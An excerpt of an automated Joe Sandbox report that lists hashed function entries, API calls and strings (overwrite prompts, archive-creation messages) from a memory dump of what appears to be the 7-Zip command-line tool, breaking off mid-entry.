                                                                • Instruction Fuzzy Hash: 03218136208B4192DA289B25E8443E96371EB9A774F545330EEBA477E4DF39C6C9C340
                                                                APIs
                                                                Strings
                                                                • (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? , xrefs: 0015CD2A
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputsfree
                                                                • String ID: (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit?
                                                                • API String ID: 2581285248-171671738
                                                                • Opcode ID: 4b5025059e70d1de0ed5aeed492243599037d1a5b9a8e456c84aaac635c9e110
                                                                • Instruction ID: 5adce3d59f18818ab2f767b2de162f54bce80e3f740f779f619921a25b7d9670
                                                                • Opcode Fuzzy Hash: 4b5025059e70d1de0ed5aeed492243599037d1a5b9a8e456c84aaac635c9e110
                                                                • Instruction Fuzzy Hash: 99317832608744CADB349F14D8963E92771E3947A6F480136EF6A4B3A5DB2CC8E9D7C1
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$memmove
                                                                • String ID:
                                                                • API String ID: 1534225298-0
                                                                • Opcode ID: 150ae877ff484c22bc24b8578f302cb24d5b1ad4491463f4b87d27cac02bb206
                                                                • Instruction ID: 0295f6585c0c9f193b5c9f2bc6f77ca296dc76747ef51ab8619e2f2cba729ecf
                                                                • Opcode Fuzzy Hash: 150ae877ff484c22bc24b8578f302cb24d5b1ad4491463f4b87d27cac02bb206
                                                                • Instruction Fuzzy Hash: 5F21846221594061CA28EB24E8511DEA721EBD67D0F545231FF6E577ADDF38C6C6C700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs$fputc
                                                                • String ID: Time =
                                                                • API String ID: 1185151155-458291097
                                                                • Opcode ID: 125f46871291328263d9a45044a61c5585df70acc1ace0c9469d427cba69f483
                                                                • Instruction ID: 704ed49ad1797a46980789bfb54b370c3e6ec2a07b2c21fe307a434e4a00686b
                                                                • Opcode Fuzzy Hash: 125f46871291328263d9a45044a61c5585df70acc1ace0c9469d427cba69f483
                                                                • Instruction Fuzzy Hash: BF216365340A15C5FA08AF1AED513A65322B798FC5F48E039DD1E0B768DE38C85AC380
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: CriticalSectionfreememmove$EnterExceptionLeaveThrow
                                                                • String ID:
                                                                • API String ID: 202075352-0
                                                                • Opcode ID: c1de02b68f69ecc8d262e9e614d11b3dc807500ecf55debccae22723f41cb44a
                                                                • Instruction ID: 73bd574b70fa5896c67f508a5d98857bb3c59aae096864e063c137383b475224
                                                                • Opcode Fuzzy Hash: c1de02b68f69ecc8d262e9e614d11b3dc807500ecf55debccae22723f41cb44a
                                                                • Instruction Fuzzy Hash: F921A477220654D6C764DF26D4456AC7321F345BE6F901329EF29076A4DF39C886CB40
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: AddressDiskFreeHandleModuleProcSpace
                                                                • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                                • API String ID: 1197914913-1127948838
                                                                • Opcode ID: 91232d8e4c27da98ed619dc657d8975082bad2379c6f63f0bea740be7d830b66
                                                                • Instruction ID: 7cb865fdc6c2b1b2e2d75ce6e06aceb008e17bd447cb90c484858614168691ae
                                                                • Opcode Fuzzy Hash: 91232d8e4c27da98ed619dc657d8975082bad2379c6f63f0bea740be7d830b66
                                                                • Instruction Fuzzy Hash: 52118973216F4696DB11CF55F880B9AB364F794B81F445022EB8E07728EF38C559CB00
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: e14598800cbc14b63090d73ae88cee87996ce6beccad5b2fb40a6b4c20696fd9
                                                                • Instruction ID: a4350275e275eddd43124a4e584e45802b6796cc1f4c02663de35e0f38f6c780
                                                                • Opcode Fuzzy Hash: e14598800cbc14b63090d73ae88cee87996ce6beccad5b2fb40a6b4c20696fd9
                                                                • Instruction Fuzzy Hash: B0110C2320298495CB19EF35E8516A92320EB97FA8F1D4371EF6D577A9CF34C896C314
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 5256221f962b44b0bae35b382dbe45db83359140e8ddd7a193f45a58e1d598c8
                                                                • Instruction ID: 91eb138fbf726ad267d8333e2e800e31d962f635207783187f6067a712c0a8d1
                                                                • Opcode Fuzzy Hash: 5256221f962b44b0bae35b382dbe45db83359140e8ddd7a193f45a58e1d598c8
                                                                • Instruction Fuzzy Hash: B9016523B0198099CB29EE26DD511A86321EBA6FE4B1D0376DF2D1B759DF70CC928340
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: a7c0efb318bb74a8d890d53e5fdb20e58762af4d74ce4d6a5953f08b0b6776bf
                                                                • Instruction ID: 6dfe1e6e63fa4f2026bb0e5ffc5361871fab8322cb398383bb03aef74cbed71f
                                                                • Opcode Fuzzy Hash: a7c0efb318bb74a8d890d53e5fdb20e58762af4d74ce4d6a5953f08b0b6776bf
                                                                • Instruction Fuzzy Hash: 9411F72274299095CA24EE35D8516AD2720EB97FA8B1C4371EF6D5B7A9CF20C896C350
                                                                APIs
                                                                • fputs.MSVCRT ref: 00156B7C
                                                                  • Part of subcall function 00116618: FormatMessageW.KERNEL32 ref: 00116676
                                                                  • Part of subcall function 00116618: LocalFree.KERNEL32 ref: 00116698
                                                                  • Part of subcall function 00112320: free.MSVCRT ref: 0011237E
                                                                  • Part of subcall function 00112320: fputs.MSVCRT ref: 001123B8
                                                                  • Part of subcall function 00112320: free.MSVCRT ref: 001123C4
                                                                  • Part of subcall function 00112300: fputc.MSVCRT ref: 00112311
                                                                • free.MSVCRT ref: 00156BAE
                                                                • fputs.MSVCRT ref: 00156BCC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputsfree$FormatFreeLocalMessagefputc
                                                                • String ID: : $----------------
                                                                • API String ID: 1215563195-4071417161
                                                                • Opcode ID: a844113c29b51b67a554de1085d4dbdaa26cfeae81c93ca6df2fe7833a2ff0cb
                                                                • Instruction ID: 26813db8faaa711a97801bc05c6c53ecf3882a2a0b8a87b6dfbbae80500fc1cf
                                                                • Opcode Fuzzy Hash: a844113c29b51b67a554de1085d4dbdaa26cfeae81c93ca6df2fe7833a2ff0cb
                                                                • Instruction Fuzzy Hash: 21015B72700905D5DA24EF26E9906AE6321F799BE5F588235EE7E077A4CF38C896C700
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 68bdc44b06e71d8ca899e980b2fc608d9b8ec41ef539896fcf9a05c16de42b60
                                                                • Instruction ID: 17d39f0d3e70b3e6c4af4a6c6a3d14eb0df8f7789a19a3d54f97a249b839b100
                                                                • Opcode Fuzzy Hash: 68bdc44b06e71d8ca899e980b2fc608d9b8ec41ef539896fcf9a05c16de42b60
                                                                • Instruction Fuzzy Hash: 5EF0CD1371185495CA59EF26DD511AC2720ABA7FD971D4271EF2D5F365CF30C8E28380
                                                                APIs
                                                                • fputs.MSVCRT ref: 0015BCD4
                                                                  • Part of subcall function 00112320: free.MSVCRT ref: 0011237E
                                                                  • Part of subcall function 00112320: fputs.MSVCRT ref: 001123B8
                                                                  • Part of subcall function 00112320: free.MSVCRT ref: 001123C4
                                                                • fputs.MSVCRT ref: 0015BD17
                                                                  • Part of subcall function 00112300: fputc.MSVCRT ref: 00112311
                                                                • free.MSVCRT ref: 0015BD2B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputsfree$fputc
                                                                • String ID: : $Write SFX:
                                                                • API String ID: 3584323934-2530961540
                                                                • Opcode ID: 0858727a3d2188373386701502e4491ffbda9cac782742d358bcdb59749fd626
                                                                • Instruction ID: 1639257e110b3777230b1c2da6d3e556a110003fabcd97c6a36cd7ab13131e82
                                                                • Opcode Fuzzy Hash: 0858727a3d2188373386701502e4491ffbda9cac782742d358bcdb59749fd626
                                                                • Instruction Fuzzy Hash: 420121A231094080DE20DF25EC5439A6321F799FE9F489231AE6E4B7A8DF28C58AC300
                                                                APIs
                                                                • fputs.MSVCRT ref: 0015BB49
                                                                • fputs.MSVCRT ref: 0015BB76
                                                                  • Part of subcall function 00112568: free.MSVCRT ref: 001125B5
                                                                  • Part of subcall function 00112568: free.MSVCRT ref: 001125C0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputsfree
                                                                • String ID: Creating archive: $StdOut$Updating archive:
                                                                • API String ID: 2581285248-1319951512
                                                                • Opcode ID: fa99d9322174690535497a2fdc6b3fb821a8ef614adec2876cfee3e0304a3bf5
                                                                • Instruction ID: 1fb98568372722b946955f3883c7d186a9e2cc42fd6ebf2e25cfec1648670ced
                                                                • Opcode Fuzzy Hash: fa99d9322174690535497a2fdc6b3fb821a8ef614adec2876cfee3e0304a3bf5
                                                                • Instruction Fuzzy Hash: 5AF049A5315A45C1EE49DF26EA943AC6322BB48FD5F48D432DE1E0B368DF2CC499C300
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: a6ffee1f7beb7570a11c572b2a51825e1f9c21a757c731fd3d53281771c8903a
                                                                • Instruction ID: b84d2001590f37840f075c11227bd93258bc7b6b2ddb067e94523913c3121c47
                                                                • Opcode Fuzzy Hash: a6ffee1f7beb7570a11c572b2a51825e1f9c21a757c731fd3d53281771c8903a
                                                                • Instruction Fuzzy Hash: 5CE0DC1261040491DB18FF76DC9116C2324E7E7F447181171DF2D4B325CF30C8A28384
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 167d3dd7d05659914fe51c99b092b0523b74a4040e8688ef161580a56a1d8b48
                                                                • Instruction ID: a7fe766d33baa7e29291702a572cf3527ed76353b32a0e82ef366842464c81aa
                                                                • Opcode Fuzzy Hash: 167d3dd7d05659914fe51c99b092b0523b74a4040e8688ef161580a56a1d8b48
                                                                • Instruction Fuzzy Hash: 7B814573305AD085CB14EF2AE8802ED77A1F795F98F494122DE690BB69CF39C896C311
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Q
                                                                • API String ID: 0-3463352047
                                                                • Opcode ID: f10b8452263e2253671aa6e26e66aae54564acf07f5c2ea8efc5759ba0d9d814
                                                                • Instruction ID: a6b2a252ef75380e2dbacd7db1824e40e469d2962a1f6953511e8df643807d16
                                                                • Opcode Fuzzy Hash: f10b8452263e2253671aa6e26e66aae54564acf07f5c2ea8efc5759ba0d9d814
                                                                • Instruction Fuzzy Hash: 08619362318B80C2CB24DF25E48066EB7A1F7D5B94F555221FB9B577A8DF38C895CB00
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID: act:$ cpus:$ gran:$ page:
                                                                • API String ID: 1294909896-454015223
                                                                • Opcode ID: 76ce10e08a2d6057f8ef9cd9582c59867cc4f4bd53d0f5b9092ac68896eb7e3a
                                                                • Instruction ID: de1ade30812b0fff454ccad012a80e9561c63c3bd9d57da1f08498022cf89605
                                                                • Opcode Fuzzy Hash: 76ce10e08a2d6057f8ef9cd9582c59867cc4f4bd53d0f5b9092ac68896eb7e3a
                                                                • Instruction Fuzzy Hash: ED51E375342651A6DE2CEB16F9513E82321EB9A7D0F889232DA0B47B58DF78C5F1C340
                                                                APIs
                                                                • free.MSVCRT ref: 001201D7
                                                                • _CxxThrowException.MSVCRT ref: 001202EA
                                                                  • Part of subcall function 0011FD30: _CxxThrowException.MSVCRT ref: 0011FE50
                                                                • _CxxThrowException.MSVCRT ref: 0012031F
                                                                Strings
                                                                • There is no second file name for rename pair:, xrefs: 00120302
                                                                • Empty file path, xrefs: 001202CD
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ExceptionThrow$free
                                                                • String ID: Empty file path$There is no second file name for rename pair:
                                                                • API String ID: 3129652135-1725603831
                                                                • Opcode ID: 5b9fd34c360db10dc0dd9c3cf23a0ee1fe89007478e2cf63242fd60c53b15542
                                                                • Instruction ID: 9ea5577693868acb147af6b88e1e7af87739d3c5332cc36cd696a7a68c978204
                                                                • Opcode Fuzzy Hash: 5b9fd34c360db10dc0dd9c3cf23a0ee1fe89007478e2cf63242fd60c53b15542
                                                                • Instruction Fuzzy Hash: D141C372208694C6CA35DB19F84079E6760F3997B4F504316EEB9077EADB38C5A5CB40
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ErrorFileLastSecurity
                                                                • String ID:
                                                                • API String ID: 555121230-0
                                                                • Opcode ID: 4264c5047130bf6628e170ce92b62f2488e22dc27d517a212768e73cfea52f87
                                                                • Instruction ID: 6b4a75529912757cb373484e0db561ae84e05621aabcc905f1b9a461d97806f7
                                                                • Opcode Fuzzy Hash: 4264c5047130bf6628e170ce92b62f2488e22dc27d517a212768e73cfea52f87
                                                                • Instruction Fuzzy Hash: 46419E33300A8496CB61CF26E8547AA73A6F388B98F594135DF5A8B714DF30CC8AC751
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID: #
                                                                • API String ID: 1294909896-1885708031
                                                                • Opcode ID: b0f2d60c1820faef58548d21b8c4e06079b1368b0e0d09608c7fde7dbc05df21
                                                                • Instruction ID: 41e8ffc83c7e19cef454089aa9b8378e62960dcb31c5d8099a2468a9dd64ccd1
                                                                • Opcode Fuzzy Hash: b0f2d60c1820faef58548d21b8c4e06079b1368b0e0d09608c7fde7dbc05df21
                                                                • Instruction Fuzzy Hash: F8318123608A9491C724DF15A94049EABA5FBE57E4F650236FF9E4B774DF38C886C700
                                                                APIs
                                                                • WideCharToMultiByte.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00113E32), ref: 00113D18
                                                                • GetLastError.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00113E32), ref: 00113D25
                                                                • _CxxThrowException.MSVCRT ref: 00113D4E
                                                                • WideCharToMultiByte.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00113E32), ref: 00113DC1
                                                                • _CxxThrowException.MSVCRT ref: 00113DFA
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ByteCharExceptionMultiThrowWide$ErrorLast
                                                                • String ID:
                                                                • API String ID: 2296236218-0
                                                                • Opcode ID: a638d3b70a987569a11810fe08a21e1709710d38c6574b86da1fec5f089001b5
                                                                • Instruction ID: 9016a35412cc7d8f7ee1c693f3fbee6be737830dfd0a1271cbdc6efbb7bdf4ec
                                                                • Opcode Fuzzy Hash: a638d3b70a987569a11810fe08a21e1709710d38c6574b86da1fec5f089001b5
                                                                • Instruction Fuzzy Hash: 0331F473708BC58ACB24CF25E48439EBBB5F784B94F948025DB9967724DB38C986C741
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: b578af894f36024e1f437a4cb75a0fc809cf4cc32df710a6eb33f0fd421a2ea5
                                                                • Instruction ID: c1f512f8c17e0df2768ac1e0bd79510fa3c87f5aad87ddf8559f40b0c973e0ac
